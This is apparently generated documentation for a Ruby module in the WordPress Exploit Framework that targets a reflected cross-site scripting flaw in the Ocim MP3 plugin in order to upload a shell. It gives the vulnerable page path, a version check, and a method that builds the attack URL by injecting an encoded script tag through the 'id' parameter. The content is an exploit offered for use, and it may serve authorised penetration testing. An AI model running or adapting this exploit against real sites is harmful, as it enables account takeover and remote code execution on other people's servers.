class Wpxf::Exploit::OcimMp3ReflectedXssShellUpload

Public Class Methods

new() click to toggle source
Calls superclass method Wpxf::WordPress::ReflectedXss::new
# File lib/wpxf/modules/exploit/xss/reflected/ocim_mp3_reflected_xss_shell_upload.rb, line 6
def initialize
  super

  update_info(
    name: 'Ocim MP3 Reflected XSS Shell Upload',
    author: [
      'Soufiane Boussali', # Discovery
      'rastating'          # WPXF module
    ],
    references: [
      ['WPVDB', '8425']
    ],
    date: 'Mar 07 2016'
  )
end

Public Instance Methods

check() click to toggle source
# File lib/wpxf/modules/exploit/xss/reflected/ocim_mp3_reflected_xss_shell_upload.rb, line 22
def check
  check_plugin_version_from_readme('ocim-mp3')
end
url_with_xss() click to toggle source
# File lib/wpxf/modules/exploit/xss/reflected/ocim_mp3_reflected_xss_shell_upload.rb, line 35
def url_with_xss
  "#{vulnerable_url}?id=%22%3E%3Cscript%3E#{xss_ascii_encoded_include_script}%3C%2Fscript%3E"
end
vulnerable_url() click to toggle source
# File lib/wpxf/modules/exploit/xss/reflected/ocim_mp3_reflected_xss_shell_upload.rb, line 26
def vulnerable_url
  normalize_uri(
    wordpress_url_plugins,
    'ocim-mp3',
    'source',
    'page.php'
  )
end